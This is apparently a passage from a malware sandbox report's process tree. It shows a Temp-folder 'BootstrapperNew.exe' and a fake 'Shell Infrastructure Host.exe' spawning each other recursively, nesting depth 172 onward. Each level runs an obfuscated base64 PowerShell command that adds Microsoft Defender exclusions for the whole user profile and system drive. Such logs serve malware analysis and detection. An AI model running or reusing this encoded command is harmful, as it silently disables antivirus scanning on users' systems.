        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        172⤵
        
        PID:2792
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        172⤵
        
        PID:64
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        172⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        173⤵
        
        PID:6704
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        173⤵
        
        PID:5736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        173⤵
        
        PID:512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        174⤵
        
        PID:1240
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        174⤵
        
        PID:6340
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        174⤵
        
        PID:7176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        175⤵
        
        PID:6908
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        175⤵
        
        PID:7688
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        175⤵
        
        PID:7744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        176⤵
        
        PID:5364
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        176⤵
        
        PID:5544
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        176⤵
        
        PID:8144
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        177⤵
        
        PID:5256
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        177⤵
        
        PID:6732
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        177⤵
        
        PID:7412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        178⤵
        
        PID:1008
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        178⤵
        
        PID:5712
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        178⤵
        
        PID:7664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        179⤵
        
        PID:4632
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        179⤵
        
        PID:5320
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        179⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        180⤵
        
        PID:3128
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        180⤵
        
        PID:5668
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        180⤵
        
        PID:4460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        181⤵
        
        PID:5784
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        181⤵
        
        PID:8180
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        181⤵
        
        PID:6856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        182⤵
        
        PID:6552
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        182⤵
        
        PID:7724
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        182⤵
        
        PID:5968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        183⤵
        
        PID:6312
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        183⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        183⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        184⤵
        
        PID:1620
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        184⤵
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        184⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        185⤵
        
        PID:7972
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        185⤵
        
        PID:6448
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        185⤵
        
        PID:5772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        186⤵
        
        PID:6800
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        186⤵
        
        PID:6380
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        186⤵
        
        PID:3460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        187⤵
        
        PID:2692
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        187⤵
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        187⤵
        
        PID:3584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        188⤵
        
        PID:8004
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        188⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        188⤵
        
        PID:8056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        189⤵
        
        PID:7044
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        189⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        189⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        190⤵
        
        PID:5864
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        190⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        190⤵
        
        PID:6300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        191⤵
        
        PID:3132
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        191⤵
        
        PID:5892
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        191⤵
        
        PID:1800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        192⤵
        
        PID:6504
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        192⤵
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        192⤵
        
        PID:7784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        193⤵
        
        PID:4504
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        193⤵
        
        PID:7496
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        193⤵
        
        PID:7652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        194⤵
        
        PID:2388
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        194⤵
        
        PID:5584
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        194⤵
        
        PID:7196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        195⤵
        
        PID:1564
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        195⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        195⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        196⤵
        
        PID:5376
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        196⤵
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        196⤵
        
        PID:6756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        197⤵
        
        PID:7752
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        197⤵
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        197⤵
        
        PID:7908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        198⤵
        
        PID:4828
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        198⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        198⤵
        
        PID:7784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        199⤵
        
        PID:1308
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        199⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        199⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
